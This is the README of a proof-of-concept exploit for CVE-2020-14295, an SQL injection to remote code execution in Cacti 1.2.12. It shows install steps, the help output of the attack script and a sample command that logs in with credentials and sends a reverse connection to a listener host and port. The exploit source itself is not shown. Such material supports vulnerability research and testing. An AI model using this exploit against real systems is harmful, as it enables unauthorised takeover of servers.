Proof of Concept for CVE-2020-14295.# CVE-2020-14295
CVE-2020-14295 proof of concept. The original post can be found at [exploit-db](https://www.exploit-db.com/exploits/49810).
## Install requirements
```
python3 -m pip install -r requirements.txt
```
## Usage
```
$ python3 cacti_sqli_rce.py --help
usage: cacti_sqli_rce.py [-h] -t <target/host URL> -u <user> -p <password>
--lhost <lhost> --lport <lport>
[*] Cacti 1.2.12 - SQL Injection / Remote Code Execution
optional arguments:
-h, --help show this help message and exit
-t <target/host URL> target/host URL, example: http://192.168.15.58
-u <user> user to log in
-p <password> user's password
--lhost <lhost> your IP address
--lport <lport> your listening port
```
```
$ python3 cacti_sqli_rce.py -t http://cacti-test.localdomain -u admin -p password --lhost 127.0.0.1 --lport 9001
```
## References
* [GitHub Issue](https://github.com/Cacti/cacti/issues/3622)
* [NIST](https://nvd.nist.gov/vuln/detail/CVE-2020-14295)
* [MITRE](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14295)
[4.0K] /data/pocs/a7fddda4d6b50ca08160dc068ff5b41b2f5b5fb0
├── [ 24M] cacti-1.2.12.tar.gz
├── [3.2K] cacti_sqli_rce.py
├── [1.1K] README.md
└── [ 149] requirements.txt
0 directories, 4 files